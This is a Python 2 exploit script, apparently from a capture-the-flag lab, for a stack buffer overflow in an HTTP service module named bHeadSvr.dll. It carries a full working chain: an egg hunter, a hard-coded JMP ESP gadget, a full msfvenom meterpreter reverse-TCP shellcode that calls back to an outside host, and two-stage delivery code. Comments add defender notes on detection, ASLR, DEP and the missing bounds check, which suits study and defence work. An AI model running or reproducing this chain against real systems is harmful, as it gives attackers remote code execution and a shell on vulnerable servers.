# Two-stage stack buffer-overflow proof of concept against an HTTP service
# (the mona search below names the module as bHeadSvr.dll). This is Python 2
# code: print statements and str-as-bytes throughout, so it does not run
# under Python 3 unmodified.
#
# Stage 1 (requests loop): places the egg-tagged payload in the target
# process's memory by sending it as the User-Agent header of several GETs.
# Stage 2 (raw socket): sends one short HEAD request whose hex-encoded path
# overflows the stack buffer, lands on a JMP ESP gadget and runs the egg
# hunter, which scans memory for the tag and jumps to the payload.
#
# Defender notes (what this traffic looks like and what stops it):
#   - Stage 1 is a burst of GETs whose User-Agent is ~376 bytes of mostly
#     non-printable data; Stage 2 is a HEAD request whose path is a long
#     hex string with no slashes or extension. Both are cheap to alert on
#     at a reverse proxy or WAF.
#   - The gadget address is hard-coded, so a rebased / ASLR-enabled module
#     breaks the chain, and DEP would stop the egg hunter executing from
#     the stack.
#   - The root cause, per the author's notes below, is a missing length
#     check on the request before it is copied into a fixed-size stack
#     buffer; bounds-checking the copy is the fix.
from socket import socket, AF_INET, SOCK_STREAM
import binascii
import requests
import time

# reversing the code -> we enter the vulnerable code if
# len(req) <= 219
# s = "HEAD / HTTP/1.1\r\n\r\n"
# print len(s)
# 19
# so we have 200 bytes
# function4, leave at address: 0040194C

# Egg hunter using NtAccessCheck
# https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
#my $egghunter =
#"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
#"\x77\x30\x30\x74". # this is the marker/tag: w00t
#"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

# egg hunter using NtDisplayString
#my $egghunter =
#"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x43\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
#"w00t".
#"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

# Egg tag. The same 4 bytes appear twice in front of the shellcode
# (egg = PWND + PWND below) and once inside the egg hunter, so it is a
# fixed byte pattern that can be matched both in traffic and in memory.
PWND = "\x50\x57\x4e\x44" # string "PWND"

# NtAccessCheck
# 18 + 4 + 10 = 32 bytes; this variant replaces the tutorial's "w00t" tag
# with PWND.
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
egghunter += PWND
egghunter += "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

# we have ESP pointing after EIP, and EAX pointing at the start of the buffer
# !mona find -s "\xff\xe4" -m bHeadSvr.dll
# Little-endian 0x625012F0: a fixed address inside bHeadSvr.dll found with
# mona. It is only valid while that module loads at its preferred base.
JMP_ESP = "\xF0\x12\x50\x62"
#JMP_EAX = "\xF2\x12\x50\x62"

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=443 EXITFUNC=process -f python -b '\x00\x0a\x0d\xff' -v shellcode
# 368 bytes
# The payload that Stage 1 delivers: 8-byte egg marker followed by the
# 368-byte encoded shellcode (376 bytes total). The bad-character list in
# the msfvenom command (NUL, CR, LF, 0xff) is what the HTTP header
# transport cannot carry.
egg = PWND + PWND
shellcode = egg
shellcode += "\xd9\xc2\xd9\x74\x24\xf4\xba\x8a\x1f\x9e\x85\x5f"
shellcode += "\x31\xc9\xb1\x56\x31\x57\x18\x83\xc7\x04\x03\x57"
shellcode += "\x9e\xfd\x6b\x79\x76\x83\x94\x82\x86\xe4\x1d\x67"
shellcode += "\xb7\x24\x79\xe3\xe7\x94\x09\xa1\x0b\x5e\x5f\x52"
shellcode += "\x98\x12\x48\x55\x29\x98\xae\x58\xaa\xb1\x93\xfb"
shellcode += "\x28\xc8\xc7\xdb\x11\x03\x1a\x1d\x56\x7e\xd7\x4f"
shellcode += "\x0f\xf4\x4a\x60\x24\x40\x57\x0b\x76\x44\xdf\xe8"
shellcode += "\xce\x67\xce\xbe\x45\x3e\xd0\x41\x8a\x4a\x59\x5a"
shellcode += "\xcf\x77\x13\xd1\x3b\x03\xa2\x33\x72\xec\x09\x7a"
shellcode += "\xbb\x1f\x53\xba\x7b\xc0\x26\xb2\x78\x7d\x31\x01"
shellcode += "\x03\x59\xb4\x92\xa3\x2a\x6e\x7f\x52\xfe\xe9\xf4"
shellcode += "\x58\x4b\x7d\x52\x7c\x4a\x52\xe8\x78\xc7\x55\x3f"
shellcode += "\x09\x93\x71\x9b\x52\x47\x1b\xba\x3e\x26\x24\xdc"
shellcode += "\xe1\x97\x80\x96\x0f\xc3\xb8\xf4\x47\x20\xf1\x06"
shellcode += "\x97\x2e\x82\x75\xa5\xf1\x38\x12\x85\x7a\xe7\xe5"
shellcode += "\x9c\x6d\x18\x39\x26\xfd\xe6\xba\x56\xd7\x2c\xee"
shellcode += "\x06\x4f\x84\x8f\xcd\x8f\x29\x5a\x7b\x91\xbd\x6f"
shellcode += "\x71\x9f\x39\x18\x87\x9f\x40\x63\x0e\x79\x12\xc3"
shellcode += "\x40\xd6\xd3\xb3\x20\x86\xbb\xd9\xaf\xf9\xdc\xe1"
shellcode += "\x7a\x92\x77\x0e\xd2\xca\xef\xb7\x7f\x80\x8e\x38"
shellcode += "\xaa\xec\x91\xb3\x5e\x10\x5f\x34\x2b\x02\x88\x23"
shellcode += "\xd3\xda\x49\xc6\xd3\xb0\x4d\x40\x84\x2c\x4c\xb5"
shellcode += "\xe2\xf2\xaf\x90\x71\xf4\x50\x65\x43\x8e\x67\xf3"
shellcode += "\xeb\xf8\x87\x13\xeb\xf8\xd1\x79\xeb\x90\x85\xd9"
shellcode += "\xb8\x85\xc9\xf7\xad\x15\x5c\xf8\x87\xca\xf7\x90"
shellcode += "\x25\x34\x3f\x3f\xd6\x13\x43\x38\x28\xe1\x6c\xe1"
shellcode += "\x40\x19\x2d\x11\x90\x73\xad\x41\xf8\x88\x82\x6e"
shellcode += "\xc8\x71\x09\x27\x40\xfb\xdc\x85\xf1\xfc\xf4\x48"
shellcode += "\xaf\xfd\xfb\x50\x40\x87\x74\x66\xa1\x78\x9d\x03"
shellcode += "\xa2\x78\xa1\x35\x9f\xae\x98\x43\xde\x72\x9f\x5c"
shellcode += "\x55\xd6\xb6\xf6\x95\x44\xc8\xd2"

# Lab target. Stage 1 goes to header_host over requests; Stage 2 connects
# to host:port directly but still sets Host: header_host. The commented
# values below point at a local test instance.
host = "10.10.10.112"
port = 80
header_host = "dev.bighead.htb"
#host = "127.0.0.1"
#port = 8080
#header_host = "127.0.0.1"

print "[+] Stage 1: sending shellcode"
# requests drops any header whose value is None, so the default
# Accept/Accept-Encoding/Content-Encoding headers are not sent; the
# request carries only Host, User-Agent (the payload) and Connection.
h = {'User-Agent': shellcode, 'Content-Encoding': None, 'Accept-Encoding': None, 'Accept': None, 'Connection': 'close'}
# Sent four times, presumably to leave several copies of the payload in
# process memory for the egg hunter to find; the loop count is arbitrary.
# The response length is printed only as a liveness check.
for i in range(0, 4):
    print "[*] req " + str(i) + " sent"
    #r = requests.post("http://" + header_host + "/", headers=h, data=shell)
    r = requests.get("http://" + header_host + "/", headers=h)
    print "> " + str(len(r.text))
    time.sleep(1)

print "[+] Stage 2: exploit"

# Raw-byte counts (Python 2 integer division: 36 and 60). Halved because
# the path is sent hex-encoded (see hexlify below) and, presumably, the
# server decodes it before the copy — TODO confirm against the binary.
EIP_OFFSET = 72/2
BUF_FILL = 120/2  # unused

# 36 filler bytes up to the saved return address, the 4-byte gadget, then
# the 32-byte egg hunter: 72 raw bytes, 144 hex characters on the wire.
buf = "\x41"*EIP_OFFSET
buf += JMP_ESP
buf += egghunter

# range(0, 1) sends a single request; the loop looks like a leftover from
# testing. No socket timeout is set, so if the service stops answering
# after the overflow recv() blocks indefinitely.
for i in range(0,1):
    sock = socket(AF_INET, SOCK_STREAM)
    sock.connect((host, port))
    sock.send("HEAD /" + binascii.hexlify(buf) + " HTTP/1.1\r\nHost: " + header_host + "\r\nConnection: close\r\n\r\n")
    print "[*] req " + str(i) + " sent"
    print "> " + sock.recv(1024)
    sock.close()